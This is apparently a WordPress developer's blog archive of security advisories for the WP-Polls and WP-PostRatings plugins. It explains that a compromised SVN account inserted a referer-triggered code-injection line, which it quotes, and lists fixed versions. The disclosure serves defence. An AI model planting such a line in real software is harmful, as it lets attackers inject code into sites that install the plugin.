Tag Archives: xss

Code Injection Follow Up

I have release 2 security updates to WP-Polls and WP-PostRatings which basically removes a malicious code that allows code injection.

The malicious code is as follows:

if ($_SERVER['PHP_SELF'] == @links_add_base_url("/", $_SERVER['HTTP_REFERER']))
return;

The code itself does nothing, but hackers are spoofing the $_SERVER['HTTP_REFERER'] that allows arbitrary code injection and note the @ sign which surpress all errors and hence the error will not be displayed.

I am 100% sure based on the points below that the code was not added by me. I am beginning to believe that my account was hacked.

  • Personally, I have no idea what links_add_base_url() does and hence it is impossible for me to place it in my own plugin code.
  • I checked the commit date for the changeset of WP-PostRatings and the date/time is 11/04/10 22:10:13. Since I am on the GMT+8 zone, it is 6am for me. I do not wake up at 6am just to update my plugin.
  • The above changeset is for trunk. However in my readme.txt, I have state that the stable tag is 1.50 and hence the file is copied to /tags/1.50/ in this changeset, but if you note the time, it is 11/05/10 00:52:39. This is almost 3 hours after the trunk commit and it is almost 9am on my timezone and I will be in my office and my office’s computer does not have SVN copies of my plugin. So it is also not possible for me to commit that file
  • If you notice the same changeset, the file is being copied from trunk to tags/1.50 by SVN copy. I do not do a SVN copy for my plugins, normally I will just copy and paste the files using my Windows Explorer.
  • For WP-Polls, there is only 1 changeset as my stable tag is from trunk and the timestamp is 11/05/10 12:30:07. This is about 12 hours after the changeset of WP-PostRatings. On my timezone it is about 8.30pm and it is not possible for me to check-in because 8pm to 9pm is my dinner time and I always eat out.
  • For WP-WAP, there is almost 2 suspicious commit, here and here. As I do not develop WP-Wap anymore, there is no reason for me to commit something to it

I am going to review all my commits to the SVN to ensure that there are no more suspicious code being added.

WP-PostRatings 1.61

I have released WP-PostRatings 1.61 which fixes a code injection via “HTTP Referrer” and affects users who are on WP-PostRatings 1.50 only. This is the same code injection fixed for WP-Polls few days back.

I have checked the rest of my plugins to ensure that the code is not in anymore of my plugins. Sorry for any inconvenienced cased.

Similar to WP-Polls, I also took this chance to port the readme.html to the proper readme.txt which WordPress.org is using and now you can see all the details of WP-PostRatings right from the plugins page itself regardless if it is from your WP-Admin or WordPress.org.

All users should upgrade now

Props to Dion Hulse aka dd32 for the report!

Download: WP-PostRatings 1.61

WP-Polls 2.61

I have released WP-Polls 2.61 which fixes a code injection via “HTTP Referrer” and affects users who are on WP-Polls 2.60 only.

I also took this chance to port the readme.html to the proper readme.txt which WordPress.org is using and now you can see all the details of WP-Polls right from the plugins page itself regardless if it is from your WP-Admin or WordPress.org.

All users should upgrade now

Vulnerability discovered by + Props to:

Dweeks, Leon Juranic and Chad Lavoie of the Swiftwill Security Team (www.swiftwill.com)

Download: WP-Polls 2.61